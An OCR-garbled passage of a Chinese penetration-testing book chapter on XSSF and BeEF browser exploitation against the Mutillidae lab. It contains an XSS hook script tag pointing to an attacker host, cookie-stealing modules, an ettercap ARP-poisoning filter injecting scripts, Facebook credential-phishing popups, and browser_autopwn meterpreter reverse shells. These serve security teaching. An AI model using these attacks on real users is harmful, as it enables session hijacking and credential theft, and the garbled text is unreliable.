xssf tunnel 
xssf urls 
xssf victims 


Description 
Displays active victims 
Adds a new automated attack (launched automatically at 


Displays XSSF automated attacks 

Prints X55 Framework banner ! 

Cleans victims in database (delete waiting attacks) 
Launches a launched module (running in jobs) on a give 


Displays information about a given victim 

Displays log with given ID 

Displays logs about a given victim 

Removes an automated attack 

Hemoves victims in database 

Restores XSSF state (victims, logs, etc.) from input f 


saves XSSF state (victims, logs, etc.) into output fil 


Displays all used attack servers 

Does a tunnel between attacker and victim 
Lists useful available URLs provided by XSSF 
Displays all victims 


图 11.8 输入 helpxssf 命 令 确 定 XSSF 已 经 装载 


5. 使 用 以 下 命令 ， 从 控制 台 访 问 与 插件 相关 联 的 URL: 


msf>xssf urls 


上 述 命令 的 执行 结果 如 图 11.9 所 示 ， 你 可 以 看 到 几 个 URL 标 识 。 


msf > xssf urls 
XSSF Server 
Generic XSS injection: 
XSSF test page 


XSSF Tunnel Proxy 
XSSF logs page 

XSSF statistics page: 
XSSF help page 


'http://192.168.43.130:8888/' 
‘Attp://192.168.43.130:8888/Loop' 
'http://192.1658.43.130:8888/test .html' 


or 'http://«PUBLIC-IP»:8888/' 
or 'http://«PUBLIC-IP2:8888/loop' 
or 'http://«PUBLIC-IP»:8888/test .htmLl' 


'localhost:8889' 

‘http://Localhost :8889/qgui .html ?guipage-main' 
"http://Llocalhost:8889/gui.html?guipage-stats' 
'http://Localhost :8889/qui .html ?guipage=help' 


图 11.9 ”运行 xssf_utls 命 令 


最 重要 的 URL 是 XSSF 服 务 器 ， 它 位 于 本 地 主机 上 。 其 他 几 个 URL 被 确定 ， 其 中 包括 : 


‘Generic XSS injection (通用 xss 注 入 ) : 这 是 你 正 试图 让 受害 者 点 击 或 执行 的 目标 。 


XSSF test page (XSSE 测 试 页 ) : XSSE 可 以 访问 本 地 测试 页 面 ， 这 极 易 受到 XSS 攻 击 。 在 实际 测试 中 ， 发 动 攻击 之 前 ， 


击 和 结果 。 


XSSF Tunnel Proxy (XSSF 隧 道 代 理 ) : XSSF 人 允许 攻击 者 使 用 受 损 主 机 的 号 份 进行 网 上 冲浪 ， 同 时 保留 他 们 的 安全 身份 标识 。 


‘XSSF logs page (XSSE 登 录 页 面 ) : 
信息 。 


ms 这 个 记录 了 攻击 和 收 到 的 信息 。 不 幸 的 是 ， 
在 测试 过 程 中 ， 我 们 通常 通过 命令 行 访问 日 志 信息 ， 这 更 直观 ， 并 可 以 编写 脚本 。 


‘XSSF statistics page (XSSE 统 计 页 面 ) 。 


‘XSSF help page (XSSE 帮 助 页 面 ) 。 


我 们 将 使 用 有 漏洞 的 Web 应 用 程序 一 一 Mutillidae， 来 证 明 XSSF。 Mutillidae 是 Metasploitable 项 目的 一 部 分 ， 可 以 


还 可 以 用 于 验证 攻 


志 页 面 提 供 了 一 个 非常 暗 的 背景 ， 并 且 很 难看 到 返回 的 


从 http://sourceforge.net/projects 人 metasploitable/files 人 Metasploitable2/ 下 载 文 件 。 请 参阅 本 书 附录 ， 安 闭 漏 洞 目标 。 


6 一 旦 Mutillidae 被 打开 ， 会 导航 到 博客 负面 ;此 页 面 是 已 知 的 XSS 攻 击 漏洞 (你 可 以 使 用 漏洞 扫描 工具 Mutillidae， 识 别 


其 他 潜在 的 插入 点 ) 。 
发 动 针 对 目标 客 己 端的 攻击 ， 不 定期 友 布 到 博客 。 蔡 代 万 法 ， 输 入 包含 目标 的 URL 和 端口 的 脚本 元 素 : 


<script 
src="http://192.168.0.104:8888/loop?interval=5"></script> 


图 11.10 显 示 了 攻击 代码 的 位 置 在 目标 网 站 的 博客 页 面 中 。 


Add blog for anonymous 


Note: <b>, </b>, «i», </i>, <u> and </u> are now allowed in blog entries| 


<script sre="http//192.168.0.104; 8888/Loop 7interval=5" ></script> 


La 
rey 


图 11.10 ”包含 恶意 代码 的 博客 页 面 


当 这 些 代码 被 输入 上 且 受 害 者 点 击 保存 博客 条 目 (Save Blog Entry) 时 ， 他 们 的 系统 将 被 侵入 。 从 Metasploit 框 架 的 控制 
合 ， 测 试 者 可 以 使 用 xssf victims 和 xssf_ information 命 令 获 取 每 个 受害 者 的 信息 。 在 执行 xssf_victims 命 令 时 ， 每 个 受害 者 的 信 


息 均 被 显示 ， 如 图 11.11 所 示 。 
在 这 一 点 上 ， 最 音 见 的 XSS 攻 击 是 友 送 一 个 简短 而 相对 无 害 的 消息 或 向 客户 痛 报 警 。 使 用 Metasploit 框 如 ， 可 以 相对 简单 地 


实现 ， 输 入 以 下 命令 : 
msf > use auxiliary/xssf/public/misc/alert 


msf auxiliary(alert) » show options 


过 命令 行 发 送 ， 如 图 11.12 所 示 。 


pa py/ 


受害 者 将 看 到 一 条 消息 ， 如 图 11.13 所 示 。 


msf > xssf vic.ims 


Victims 


ID SERVER ID IP 


l ] 


192.168.060.104 


ACTIVE 


true 5 


m cm oro mr IN Cum Cum o mmo cmo SE mm 


Firefox 


[*] Use xssf information [VictimID] to see more information about a victim 
mst > xssf information 1 


INFORMATION ABOUT 


IP ADDRESS 
ACTIVE ? 
FIRST REQUEST 
LAST REQUEST 


VICTIM 1 


: 192.168.0.104 

: TRUE 

: 2814-81-31 17:12:15 
. 2014-01-31 17:14:20 
CONNECTION TIME : 


Ohr 2min 5sec 


BROWSER NAME : Firefox 

BROWSER VERSION : 22.0 

OS NAME : Linux 

OS VERSION : Unknown 

ARCHITECTURE : ARCH X86 64 

LOCATION : http: +//192.168.0.108:80 
XSSF COOKIE ? * NES 

RUNNING ATTACK  : NONE 

WAITING ATTACKS : OQ 


图 11.11 ”执行 Xssf_victims 命 令 显示 受害 者 信息 


INTERVAL BROWSER NAME BROWSER VERSION COOKIE 


msf auxiliary(alert) > set AlertMessage Compromised by DigitalDefence 
AlertMessage => Compromised by DigitalDefence 
msf auxiliary(alert) » run 


de - 


[ 
[^ 
[ 


] Auxiliary module execution started, press [CIRL + C] to stop it ! 
] Using URL: http://0.0.0.0:8080/CIGZGBemqT 
] Local IP: http://192.1658.0.104:8080/CIGZGBemqT 


* 


Remaining victims to attack: [[1] (1)] 

Code 'auxiliary/xssf/public/misc/alert' sent to victim '1' 
Remaining victims to attack: NONE 

Auxiliary interrupted by the console user 

server stopped. 


Compromised by DigitalDefence 


图 11.13 受害 者 看 到 消息 
一 般 来 说 ， 大 多 数 测 试 者 和 他 们 的 客户 验证 跨 站 点 脚本 ,使 用 这 种 简单 的 警告 消息 。 这 证 明了 一 个 “漏洞 ”的 存在 。 
然而 ,简单 的 警报 缺乏 情绪 的 影响 。 通 常情 况 下 ， 它 们 确定 的 是 一 个 真正 的 漏洞 ， 但 客户 并 不 响应 和 处 理 该 漏洞 ， 因 为 警报 
消息 不 被 认为 是 一 个 显 闭 的 威胁 。 至 运 的 是 ，XSSF 人 允许 测试 者 “提高 赌注 ”， 并 表现 出 更 复杂 、 更 危险 的 攻击 。 
通过 使 用 以 下 命令 ，XSSsF 可 以 窃取 信息 记录 程序 : 
msf» use auxiliary/xssf/public/misc/cookie 


msfauxillary(cookie) » show options 
(ensure all needed options selected) 


msfauxillary(cookie) > run 
运行 上 述 命令 的 执行 结果 如 图 11.14 所 示 。 
msf auxiliary(cookie) > run 
[*] Auxiliary module execution started, press [CIRL + C] to stop it ! 
[*] Using URL: http://0.0.0.0:8080/xuIHFacBs 
[*] Local IP: http://192.168.43.130:8080/xuIHFacBs 
Remaining victims to attack: [[1] (1)] 
Code 'auxiliary/xssf/public/misc/cookie' sent to victim '1' 


Hemaining victims to attack: NONE 
Response received from victim 1 from module ‘Cookie getter’ 


图 11.14 偷 取 信息 记录 程序 


当 攻 击 已 经 完成 时 ， 该 信息 记录 程序 ， 可 以 通过 审查 XSSF 日 志 页 面 上 的 结果 ,或 直接 在 命令 行 上 使 用 命令 友 现 ， 如 图 11.15 


AIT. 


msf> xssf log 2 
Result stored on log 2: 
PHPSESSID-2f6f/fdec6749c13ed22f91/c344ce238 | 


图 11.15 ”查看 信息 记录 程序 


在 auxiliary/xssf/public/misc 上 的 其 他 一 些 有 用 的 命令 包括 : 


'check connected: 此 命令 检查 受害 人 是 否 已 经 打开 了 任何 社交 网 站 (Gmail、Facebook 或 Twitter) . 
Csrf: 它 局 动 一 个 跨 站 扩 请 求 伪造 攻击 。 
‘keylogger: 该 命令 调用 客户 端 上 的 一 个 键盘 记录 器 。 


“load applet5Eload pdf: 这 两 个 命令 加 载 客 户 端 上 的 恶意 Java 小 程序 和 PDF 文 件 ， 并 调用 它们 启动 预 配置 恶意 软件 。 


‘redirect: 它 将 客户 端 重 定 问 到 指定 的 Web 页 面 。 


‘webcam capture: 此 命令 从 客户 机 的 网 络 摄像 头 捕 捉 图 像 。 


这 是 一 个 不 完整 的 列表 ,但 它 显 示 了 该 工具 的 友 展 程度 。 此 外 ， 还 有 一 些 用 于 网 络 扫 描 和 友 起 拒绝 服务 攻击 的 模块 ， 以 及 一 
些 用 于 保持 已 完成 攻击 的 持久 性 的 模块 。 


XSSF 也 可 以 与 ettercap 一 起 用 于 入 侵 内 部 网 络 。 例 如 ，ettercap 可 以 用 来 与 恶意 页 面 连接 以 取代 </head> 数 据 ， 通 过 将 以 
下 代码 放 在 一 个 名 为 attack 的 过 滤器 中 来 实现 。 


if (ip.proto == TCP && tcp.src == 80) { 
if (search(DATA.data, "</head>")) { 
replace("-/head»", "</head><script 


sro=\"http://192.168.43.130:888s/test .html\"s</script> "J; 


使 用 以 下 命令 将 过 滤器 脚本 转换 成 二 进 制 文件 : 


etterfilter attack.filter -o attack.ef 
上 友 动 针对 网 络 上 所 有 用 户 的 这 种 攻击 ， 执 行 ettercap， 使 用 以 下 命令 : 


ettercap -T -q -F attack.ef -M ARP // // 


XSSF (495 SS SekZlMetasploitiEZRAy) 是 一 个 非常 强大 的 利用 XSS 漏 洞 的 工具 。 然 而 ， 一 个 新 的 明星 最 近 出 现 了 ， 其 
可 以 帮助 你 实现 类 似 的 攻击 ， 它 束 是 BeEF ( 浏 氏 器 开 友 框架 ) . 


11.3. Nara AER — —BeEF 


BeEF (Brower Exploitation Framework) 是 一 种 开发 工具 ， 专 注 于 一 个 特定 的 客户 端 应 用 程序 : Web 浏 览 器 。 


BeEF 人 允许 攻击 者 使 用 如 XSSs 或 SQL 注入 的 攻击 ， 将 Javascript 代 码 注 入 到 脆弱 的 HTML 代 码 。 这 种 攻击 代码 被 称 为 钩 
(hook) 。 破 坏 是 由 浏览 器 执行 钩 时 实现 的 。 浏 览 器 (fF) 连接 回 BeEF 应 用 程序 ， 其 提供 给 浏览 器 的 JavaScript 命 令 或 模 
块 。 

BeEF 的 模块 执行 任务 如 下 : 


-指纹 识别 和 受 损 浏览 器 的 侦察 。 它 也 可 以 作为 一 个 平台 ， 用 来 评估 存在 于 不 同 浏览 费 上 的 攻击 和 它们 的 行为 。 


Sammie, BeEF IO VFA EE I] — m P m EYES Due. DAR E-MAIL Ais BERIHBT BUE E CA] 
-指纹 识别 目标 主机 ， 包 括 存 在 的 虚拟 机 。 


:在 客户 端 上 检测 软件 〈 仅 限 互联 网 浏览 器 ) ， 并 获得 在 程序 文件 (Program Files) 和 程序 文件 (x86) 目录 里 的 目录 列表 。 这 可 以 识别 其 
他 可 以 被 利用 的 应 用 程序 ， 以 维持 我 们 在 客户 端 上 的 状态 。 


-使 用 受 损 系统 的 网 络 摄像 头 摄 取 照 片 ， 这 些 照 厂 在 报告 中 有 重要 的 影响 。 

:对 受害 者 的 数据 文件 进行 搜索 ， 并 甸 取 可 能 包含 号 份 验证 凭证 的 数据 (可 贴 板 中 的 内 容 和 浏览 费 的 信息 记录 程序 ) 或 其 他 有 用 信息 。 
实现 浏览 器 击 键 记录 。 

使 用 ping 扫 描 和 指纹 机 制 对 网 络 设备 进行 网 络 侦察 ， 并 扫描 开放 端口 。 

.从 Metasp1loit 框 架 发 动 攻击 。 

-使 用 隧道 代理 扩展 ， 利 用 受 损 web 浏览 器 的 安全 权限 ， 攻 击 内 部 网 络 。 


因为 BeEF 是 用 Ruby 编 写 的 ， 它 文 持 多 个 操作 系统 (Linux, Window#]OS X) 。 更 重要 的 是 ， 它 很 容易 在 BeEF 及 其 扩展 功 
能 中 定制 新 模块 。 


SCA BCS DU ARS AER 
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root@kali:~# apt-get install beef-xss 


BeEF 将 被 安装 到 /usr/share/beef-xss 目 录 中 。 上 默认 情况 下 ， 它 不 能 在 Metasploit 框 架 中 集成 。 要 集成 BeEF， 则 需要 执行 以 
TEUER: 
1. 编 辑 位 于 /usr/share/beef-xss/config.yaml 中 的 主要 配置 文件 以 便 阅 读 。 
metasploit: 


enable:true 


2. 编 辑 位 于 /usr/share/beef-xss/extensions/metasploit/config.ymlI 中 的 文件 。 你 需要 为 Metasploit 框 架 编辑 行 : host, 
callback host、os'custom'， 以 及 包括 你 的 IP 地 址 和 位 置 的 path。 一 个 正确 编辑 后 的 config.ym| 文 件 如 图 11.16 所 示 。 


14 extension: 


I5 metasploit: 

16 name: ‘Metasploit’ 

]/ enable: true 

[B host: '192.168.1.104" 

13 port: 5555Z 

20 user: "msf" 

zl pass: '"abcl23' 

22 uri: '/api 

23 ssl: false 

24 ssl version: 'SSLv3' 

23 ssi verify: true 

26 callback host: “102 168. 1.764" 

ET autopwn url: "autopwrn' 

28 auto msfrpcd: false 

29 auto msfrpcd timeout: 120 

3 mst path: | 

31 ios: 'osx' , path: '/opt/local/msT/'), 

32 [os: 'livecd', path: '/opt/metasploit-framework/'], 
33 (os: 'bt»r3', path: ‘/opt/metasploit/msf3/'}, 

34 los: 'bt5', path: '/opt/framework3/msf3/'}, 

35 tos: 'backbox , path: '/opt/metasploit3/mst3/'], 
36 ios: 'win', path: 'c:XXmetasploit-frameworkXM'), 
37 [os: ‘custom’, path: 'usr/share/metasploit-framework/ ' | 


图 11.16 正确 编辑 的 config.yml 文 件 
3. 开 局 msfconsole， 并 加 载 msgrpc 模 块 ， 如 图 11.17 所 示 。 确 保 已 包含 密码 : 


msf > Load msgrpc ServerHost=192.168.43.130 Pass-abcl23 
[*] MSGRPC Service: 192.168.43.130:55552 

[*] MSGRPC Username: msf 

[*] MSGRPC Password: abcl23 

[^] Successfully Loaded plugin: msgrpc 

mst > 


图 11.17 加 载 msgrpc 模 块 


4. 使 用 以 下 命令 局 动 BeEF : 
root@kali:~# cd /usr/share/beef-xss/ 
root@kali: /usr/share/beef-xss/~-# ./beef 


5. 如 果 消 息 显示 成 功 连接 到 Metasploit (Successful connection with Metaspliot) ， 同 时 显示 Metasploit 攻 击 已 经 加 
载 ， 说 明 BeEF 启 动 成 功 。 成 功 局 动 后 的 消息 如 图 11.18 所 示 。 


root@kali:~# cd /usr/share/beef-xss 
root@kali:/usr/share/beef-xss# ./beef 


[13:12:4/7][*] Bind socket [imapeudoral] listening on [0.0.0.€:2000]. 
[13:12:47][*] Browser Exploitation F^amework (BeEF) 0.4.4.5-élpha 
[13:12:47] | Twit: @beefproject 

[13:12:47] | Site: http://beefp-oject.com 

[13:12:47] | Blog: http://blog.beefproject.com 

[13:12:47] | Wiki: https://github.com/beefproject/beef/wiki 
[13:12:47][*] Project Creator: Wade Alcorn (GQWadeAlcorn) 
[13:12:48] [*] Successful connection with Metasploit. 
[13:12:49][*] Loaded 258 Metasploit exploits. 

[13:12:49][*] BeEF is loading. Wait a few seconds... 
[13:12:49][*] 11 extensions enabled. 

[13:12:49] [*] 429 modules enabled. 

[13:12:49]|[*] 2 network interfaces were detected. 

[13:12:49] [+] running on network interface: 127.0.0.1 

[13:12:48] | Hook URL: http://12/.0,0.1:80/hook.js 
[13:12:48] | UI URL: http://12/.8.0.1:80/ui/paneLl 
[13:12:48] [+] running on network interface: 192.168.222.129 
[13:12:49] | Hook URL: http://192.168.222.129:80/hook.js 
[13:12:49] | UI URL: http ://192.168.222.129:80/ui/panel 
[13:12:49][*] RESTful API key: Bffe05lfeOGadOd3f95c4b4lcBS96S9bS1dB8d4b6418 
[13:12:49] [*] HTTP Proxy: http://127.0.0.1:6789 

[13:12:49] [*] BeEF server started (p^ess control+c to stop) 


图 11.18 BeEFÈ 3j 3 


忆 当 你 重启 BeEF， 可 用 -x 开关 复位 该 数据 库 。 


在 这 个 例子 中 ，BeEF 服 务 器 运行 在 192.168.222.129， 并 且 “ 钩 URL 网 址 ” (我 们 希望 目标 是 激活 ) 是 在 
192.168.222.129: 80/hook.js 上 。 


大 部 分 管理 和 BeEF 的 管理 是 通过 Web 界 面 完成 的 。 要 访问 控制 面板 ， 首 先 访问 http://:3000/ui/panel。 


默认 的 登录 凭证 是 Username: beef 和 Password: beef， 如 图 11.19 所 示 ， 除 非 这 些 在 config.yaml 中 发 生 了 变化 。 


simam 


Password: 


图 11.19 m B BeEF RAD 


11.4 ”BeEF 浏 览 器 的 演练 


当 BeEF 控 制 面板 局 动 时 ， 它 将 显示 开始 (Getting Started) 屏幕 ; 包含 链接 到 在 线 网 站 ， 以 及 演示 可 用 于 验证 各 种 攻击 的 
页 面 。BeEF 控 制 面板 的 显示 如 图 11.20 所 示 。 


| | i BeEF Control Panel 


E @ 127.0.0. 1/ui/panel 


fi Most Visitedv [fJOffensive Security "X Kali Linux “& Kali Docs QExploit-DB WaAircrack-ng 


Hooked Browsers | Hooked Browsers Gettin g Started 
(J Online Browsers | 


4 Offline Browsers 
40312700.1 
? ð 8 127001 


THE BROWSER EXPLOITATION FRAMEWORK PROJECT 


Official website: http //beefproject.com/ 


Getting Started 
Welcome to BeEF! 


Before being able to fully explore the framework you wil have to 'hook' a browser. To begin with you 
can point a browser towards the basic demo page here, or the advanced version here. 


IT you want to hook ANY page (for debugging reasons of course), drag the following bookmarklet link 
into your browser's bookmark bar, then simply click the shortcut on another page: Hook Me! 


After a browser is hooked into the framework they wil appear in the Hooked Browsers' panel on the 


left. Hooked browsers will appear in ether an online or offline state, depending on how recently they 
have polled the framework. 


图 11.20 BeEF 控 制 面板 


如 果 你 已 经 多 到 一 个 受害 者 ， 则 接口 将 被 分 为 两 个 面板 : 


面板 的 左 侧 是 带 钩 浏览 器 〈Hookeqd Browsers) ,测试 人 员 可 以 看 到 每 一 个 连接 浏览 占 ， 列 出 了 有 关 其 主机 操作 系统 的 信息 : 浏览 器 类 
型 、IP 地 址 ， 以 及 安装 的 插件 。 因 为 BeEF 设 置 了 一 个 信息 记录 程序 来 识别 受害 者 ， 它 可 以 参考 这 些 信息 来 保持 受害 者 名 蛙 的 一 任性 。 


面板 的 右 侧 所 有 的 动作 已 被 局 动 ， 并 且 获 得 了 结 末 。 在 Commangds 选 项 卡 中 ， 我 们 看 到 一 个 使 用 不 同 攻 击 问 量 的 分 类 存储 库 ， 其 可 以 攻击 上 
钓 的 浏览 器 。 此 视图 将 根据 不 同 浏 览 器 的 类 型 和 版 本 而 有 所 不 同 。 


BeEF 采 用 颜色 编码 方案 ， 摘 述 天 于 特定 的 目标 及 其 可 用 的 基础 命令 。 使 用 的 颜色 如 下 : 

绿色 (Green) : 表明 该 命令 模块 对 目标 工作 ， 将 被 受害 者 检测 到 。 

FE, (Orange): 表示 该 命令 模块 对 目标 工作 ， 它 可 能 被 受害 者 检测 到 。 

IRE, (Gray) : 表明 该 命令 模块 尚未 得 到 目标 验证 。 

-红色 (Red) : 表明 该 命令 模块 针对 目标 不 工作 。 它 可 以 被 使 用 ， 但 不 能 保证 成 功 ， 它 的 使 用 可 能 被 目标 检测 到 。 


必须 对 这 些 指标 持 有 怀疑 态度 ， 因 为 变化 的 客 尸 端 环境 可 以 使 一 些 命令 失效 ,或 可 能 导致 其 他 意 想 不 到 的 结果 。 


要 启动 一 个 攻击 或 拦截 一 个 受害 者 ,我们 需要 用 户 点 击 上 和 钓 的 网 址 ， 其 形式 如 <IP ADDRESS>: <PORT>/hook.js。 可 以 
通过 使 用 各 种 手段 来 实现 ， 其 中 包括 : 

.最 初 的 XSS 漏 洞 。 

-中间人 攻击 (尤其 是 那些 使 用 BeEF Shank, an ARR IW LE, SIE MAMMA PAA . 

社会 工程 攻击 ， 包 括 BeEE 网 络 克 隆 工 具 和 大 量 电子 邮件 ， 由 假冒 的 1Frame 和 定制 的 钧 点 ， 或 二 维 码 生成 器 。 


一 旦 浏览 器 被 钩 住 ， 它 将 被 称 为 僵尸 。 从 Hooked Browsers 面 板 上 ， 命 令 接口 的 左 侧 选择 该 僵尸 的 |P 地 址 ， 然 后 参考 可 用 
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在 图 11.21 所 示 的 例子 中 ， 有 几 种 不 同 的 攻击 均 可 用 于 市 多 浏览 器 的 管理 选项 。 一 个 最 简单 的 攻击 选择 是 使 用 社会 工程 


Clippy 攻 击 。 


当 Clippy 从 Commands 下 的 Module Tree 被 选 出 时 ， 一 个 具体 的 Clippy 在 最 右 侧 的 面板 启动 ， 如 图 11.21 所 示 。 它 允许 你 调 
整 图 像 ， 提 供 文本 和 将 在 本 地 发 动 的 可 执行 文件 ， 如 果 受 害 者 点 击 了 提供 的 链接 。 在 默认 情况 下 ， 自 定义 文本 通知 受害 者 他 们 的 
浏览 器 已 过 期 ， 为 他 们 提供 更 新 ， 下 载 可 执行 (无 恶意 的 ) 文件 ， 然 后 感谢 执行 升级 的 用 户 。 所 有 这 些 选项 可 以 由 测试 人 员 更 


改 。 


> (Browser (43) 

> J Chrome Extensions (6) 

b Debug (8) 

b (J Exploits (48) 

> [Hest (15) 

p. [_JIPEC (6) 

> (Metasploit (258) 

b [Mise (7) 

b [Network (8) 

> [Persistence (4) 

p (-Phonegap (15) 

4 C3 Social Engineering (10) 
SS Clickjacking 
.» Lcamtuf Download 
@ Clippy 
@ Fake Flash Update 
@ Fake Notification 
@ Google Phishing 
@ Pretty Theft 


[i| dae | label 


The results from executed 
command modules will be 
listed here. 


Description: Brings up a clippy image and asks 
the user to do stuff. 


| Clippy image: | http.//clippy.ajbne 


Custom text: | Your browser ap 
Executable: http the. earth lif 


Time until 5000 


Clippy shows 


his face again: 


Thankyou | Thanks for upgre 


message after 


| downloading: 


图 11.21 Clippy 攻 击 


当 执行 Clippy 时 ， 受 害 者 将 在 他 们 的 浏览 器 上 看 到 一 条 消息 ， 如 图 11.22 所 示 。 


@ | @ 127.0.0.1/demos/basic.html 


TVG] cog č a) 9 ff di 
B Most Visitedv [fJOffensive Security & Kali Linux 'Ñ Kali Docs KliExploit-D8 WiAircrack-ng 
You should be hooked into BeEF. 


Have fun while your browser 1s working against you. 


EC | | Tol RE a, 4 | Your brows 
These links are for demonstrating the "Get Page HREFs" command module Mandar du QUEDÉ 


date Would you like 
to Upgrade it? 


Have a go at the event logger. 
Insert your secret here: 


You can also load up a more advanced demo page here 


图 11.22 ”在 Clippy 攻 击 中 ， 受 害 者 看 到 信息 
这 是 一 个 非常 有 效 的 社会 工程 攻击 。 在 与 客 尸 的 测试 中 ,我们 有 大 约 70% 的 成 功率 (客户 闯 下 载 一 个 无 恶意 的 所 标 文 件 ) 。 


提示 模块 以 类 似 的 方式 工作 。 它 友 送 一 个 通知 请 求 提示 用 户 输 入 数据 ， 而 不 是 给 受害 者 的 浏 氏 器 友 送 一 个 简单 的 警报 。 在 许 
多 情况 下 ， 如 果 系 统 提示 未 定义 的 数据 给 受害 者 ， 他 们 将 目 动 重新 输入 密码 。 提 示 可 以 要 求 特定 的 数据 ， 也 可 以 引导 受害 者 从 一 
个 网 站 下 载 含 有 恶意 软件 的 系统 包 补 丁 。 图 11.23 显 示 了 一 种 最 简单 、 最 有 效 地 获取 用 户 密码 的 攻击 。 


(«€ | @ 192.168,43.130:4444/demos/basic, hem 


图 11.23 ”DeEF 简 单 有 效 地 获取 用 户 账户 密码 


一 个 更 有 趣 的 攻击 是 Pretty Theft， 其 要 求 用 户 提供 最 热门 网 站 的 用 户 名 和 密码 。 例 如 ， 对 于 Facebook 的 Pretty Theft: 


项 ， 可 以 由 测试 人员 进行 配置 ， 如 图 11.24 所 示 。 


Description: Asks the user for their username and password using a floating div. 
Dialog lype: Facebook 

Backing: 

Custom Logo http /0.0.0.0:4444/ui/media/images/beef.png 


(Generic only): 


Execute | 


图 11.24 Pretty Theft 选 项 


当 执 行 攻击 时 ， 受 害 者 呈现 一 个 似乎 合法 的 弹出 ， 如 图 11.25 所 示 。 


Facebook Session Timed Out 


Your session has timed out due to inactivity, 


Please re-ente* your username and password to legin. 


: | cert beqgs@idiqitaldetence.ca 


Email 


Password: 


图 11.25 ”受害 者 看 到 的 要 求 输入 Facebook 窗 码 的 界面 


在 BeEF 中 ， 测 试 人 员 审 查访 攻击 的 历史 记录 ， 可 以 在 Command results 列 的 data 字 段 中 获得 用 户 名 和 密码 ， 如 图 11.26 所 


7Jvo 


Command results 一 | 


id | dare | label a | | Tue Feb 04 2014 16:1153 GMT-0500 (EST) | 
data: answer=robert beggs@digtaldefence capassword 


0 2014-02... command 


16:04 1 
1 2014-02... command 
16:11 2 


图 11.26 ”从 历史 数据 中 发 现 用 户 名 及 密码 
11.4.1 整合 BeEF 和 Metasploit 攻 击 


BeEF 和 Metasploit 框 架 均 是 用 Ruby 开 发 的 ， 并 且 可 以 一 起 使 用 来 攻击 目标 。 由 于 其 使 用 客户 新 和 服务 端的 指纹 识别 确定 目 
标 ， 所 以 browser autopwn 是 一 个 最 成 功 的 攻击 。 


一 旦 目标 上 钧 ， 启 动 Metasploit 控 制 台 并 使 用 以 下 命令 配置 该 攻击 : 


maf > use auxiliary/server/browser autopwn 

msf auxiliary (browser autopwn) > set LHOST 192.168.43.130 

msf auxiliary (browser autopwn) > set PAYLOAD WIN32 
windows/meterpreter/reverse tcp 

msf auxiliary (browser autopwn) > set PAYLOAD JAVA 
java/meterpreter/reverse tcp 

msf auxiliary (browser autopwn) > exploit 


等 到 所 有 相关 的 漏洞 利用 加 载 完 毕 。 在 图 11.27 所 示 的 例子 中 ， 有 18 个 漏洞 利用 被 加 载 。 同 样 也 记录 了 该 攻击 目标 的 URL。 
在 这 个 例子 中 ， 目 标 URL 是 http://192.168.43.130: 8080/ICprp4Tnf4Z: 


[*] Starting handler for java/meterpreter/reverse tcp on port //// 
[*] Started reverse handler on 192.168.43.130:6666 

[*] Starting the payload handler... 

[*] Started reverse handler on 192.168.43.130:///7/ 

[*] Starting the payload handler... 


[*] --- Done, found exploit modules 
[*] Using URL: http://6.0.0.0:8080/ICprpATnf4Z 
[*] Local IP: http://192.168.43.130:8080/ICprp4ATnf4Z 
[*] Server started. 
图 11.27 ”加 载 brfowset_autopwn 利 用 


有 几 种 方法 可 以 直接 让 浏览 器 点 击 目标 URL， 但是， 如 果 我 们 已 经 连接 了 目标 浏览 器 ， 可 以 使 用 BeEF 的 redirect 功 能 。 在 
BeEF 的 控制 面板 中 ， 进 入 Browser|Hooked Domain|Redirect Browser。 当 出 现 提 示 时 ， 使 用 此 模块 措 向 目标 URL， 然 后 执行 
该 攻击 。 


在 Metasploit 的 控制 人 台中， 你 将 看 到 所 选 的 攻击 针对 目标 成 功 友 起 。 一 个 成 功 的 攻击 将 打开 一 个 Meterpreter 会 话 ， 如 图 
11.28 所 示 。 


[*] Meterpreter session 1 opened (192.168.43.130:3333 -> 192.168.43.128:1168) at 
2014-02-04 14:12:34 -0500 
[*] Session ID 1 (192.168.43.130:3333 -> 192.168.43.128:1168) processing Initial 
AutoRunScript 'migrate -f' 
[*] Current server process: iexplore.exe (516) 
[*] Spawning notepad.exe process to migrate to 
Migrating to 1244 
successfully migrated to process 
msf auxiliary(browser autopwn) > | 


图 11.28 一 个 成 功 的 攻击 打开 的 Meterpreter 会 话 


在 受 损 目标 上 查看 打开 的 会 话 列 表 ， 输 入 sessions-|.。 以 交互 方式 与 一 个 特定 的 会 话 连 接 ， 例 如 ， 会 话 1， 输 入 sessions-i 


11.4.2 ”用 BeEF 作 为 隧道 代理 


隧道 是 一 个 在 交付 协议 中 封装 有 效 载 何 协议 的 过 程 ， 如 IP。 使 用 隧道 ， 你 可 以 在 网 络 上 传输 不 兼容 的 协议 ,或 者 ， 你 也 可 以 
绕 过 被 配置 为 阻止 特定 协议 的 防火 墙 。BeEF 可 以 被 配置 为 隧道 代理 ,模仿 一 个 反 向 HTTP 代 理 : 浏览 器 会 话 变 成 隧道 ， 市 钩 浏 贤 
器 变 成 出 口 点 。 当 内 部 网 络 已 被 破坏 时 ， 这 个 配置 是 相当 有 用 的 ， 因 为 隧道 代理 可 以 农用 于 : 


-浏览 通过 身份 验证 网 站 的 、 受 害 者 浏览 器 的 安全 内 容 〈( 客 户 端 SSL 证 书 、 认 证 的 信息 记录 程序 、NTLM 散 列 冰 数 ， 等 等 ) 
使 用 受害 者 浏览 器 的 安全 内 容 ， 扑 已 经 上 钓 的 域 。 
便于 使 用 的 工具 ， 如 SQI 注 入 。 


要 使 用 隧道 代理 ， 选 择 市 钩 浏览 器 ， 你 希望 的 目标 并 且 右 键 单 击 其 IP 地 址 。 在 弹出 的 对 话 框 中 ， 选 择 Use as Proxy 的 选项 ， 
如 图 11.29 所 示 。 


= Hooked Browsers Getting Started 
4 ——JOnline Browsers 
4 C3 192.168 222.130 
? O B 124r: 3 

4‘) Offline Browsers T Use as Proxy 
4 (3 192.168.43.130| þ 4 Launch XssRays on Hooked Domain 
? AS 192 168778 T» Debug (8) 


图 11.29 使 用 隧道 代理 
配置 浏览 器 ， 使 用 BeEF 隧 道 代 理 作 为 HTTP 人 代理。 在 默认 情况 下 ， 访 代理 的 地 址 是 127.0.0.1， 端 口号 是 6789。 


如 果 你 访问 一 个 目标 网 站 ， 使 用 设置 为 HTTP 代 理 的 浏览 器 ， 所 有 生成 的 请 求 / 啊 应 对 将 被 仔 储 企 BeEF 的 数据 库 中 ， 其 可 以 
锌 分析， 导航 到 Rider|History (日 志 摘 录 如 图 11.30 所 示 ) 。 


Hooked Browsers Getting Started Y 


一 X Logs | Current Browser 
4‘) Online Browsers 一 


4 3 192.168.222.130 | Jl 
